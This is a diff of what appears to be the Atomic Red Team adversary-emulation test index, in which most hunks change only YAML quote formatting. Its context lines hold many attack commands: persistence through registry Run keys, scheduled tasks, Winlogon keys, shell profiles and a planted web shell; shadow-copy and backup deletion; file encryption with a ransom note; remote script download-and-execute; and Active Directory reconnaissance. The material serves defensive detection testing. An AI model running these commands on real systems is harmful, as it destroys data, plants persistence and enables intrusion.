T1542.004: technique: created: '2020-10-20T00:05:48.790Z' @@ -47545,10 +47545,10 @@ persistence: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1108: @@ -47743,11 +47743,11 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -47765,11 +47765,11 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -47795,7 +47795,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -48016,10 +48016,10 @@ persistence: ~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys; fi; - ' +' cleanup_command: 'unset ssh_authorized_keys - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -48117,7 +48117,7 @@ persistence: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -48134,10 +48134,10 @@ persistence: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -48173,11 +48173,11 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -48199,7 +48199,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -48216,7 +48216,7 @@ persistence: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -48227,7 +48227,7 @@ persistence: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -48240,7 +48240,7 @@ persistence: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -48252,7 +48252,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -48388,7 +48388,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -48698,7 +48698,7 @@ persistence: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -48718,22 +48718,22 @@ persistence: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1547.009: technique: @@ -48806,7 +48806,7 @@ persistence: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -48907,10 +48907,10 @@ persistence: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1542.001: @@ -49087,7 +49087,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -49160,15 +49160,15 @@ persistence: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true @@ -49320,20 +49320,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -49350,20 +49350,20 @@ persistence: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed - ' +' prereq_command: 'Get-TransportAgent -TransportService FrontEnd - ' +' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - ' +' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) - ' +' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} - ' +' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 @@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 @@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - ' +' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force @@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes - ' +' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: - ' +' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located - ' +' prereq_command: 'which_gpg=`which gpg` - ' +' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} - ' +' cleanup_command: 'rm #{encrypted_file_path} - ' +' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located - ' +' prereq_command: 'which_7z=`which 7z` - ' +' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. - ' +' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file - ' +' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` @@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi - ' +' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located - ' +' prereq_command: 'which_openssl=`which openssl` - ' +' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - ' +' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 - ' +' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. - ' +' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'vssadmin.exe create shadow /for=c: - ' +' executor: command: 'vssadmin.exe delete shadows /all /quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair @@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - ' +' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. - ' +' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 - ' +' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task - ' +' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable - ' +' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. - ' +' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null - ' +' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} - ' +' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe @@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} - ' +' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} - ' +' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. - ' +' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} - ' +' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. - ' +' supported_platforms: - macos - linux @@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} - ' +' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. - ' +' supported_platforms: - macos - linux executor: command: 'reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt -p - ' +' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt --reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff - ' +' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff --reboot - ' +' name: bash elevation_required: true T1565.002: @@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) - ' +' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 - ' +' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force - ' +' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks - ' +' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite - ' +' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites - ' +' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} - ' +' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 @@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) - ' +' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} - ' +' executor: command: 'Invoke-Expression #{adrecon_path} - ' +' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt @@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account - ' +' supported_platforms: - windows executor: command: 'net user administrator /domain - ' +' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed - ' +' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} - ' +' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name - ' +' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 @@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. - ' +' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. - ' +' - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - ' +' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | @@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * - ' +' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk - ' +' prereq_command: 'WHERE nltest.exe >NUL 2>&1 - ' +' get_prereq_command: 'echo Sorry RSAT must be installed manually - ' +' executor: command: 'nltest /domain_trusts - ' +' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk - ' +' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" - ' +' - description: 'RSAT PowerShell AD 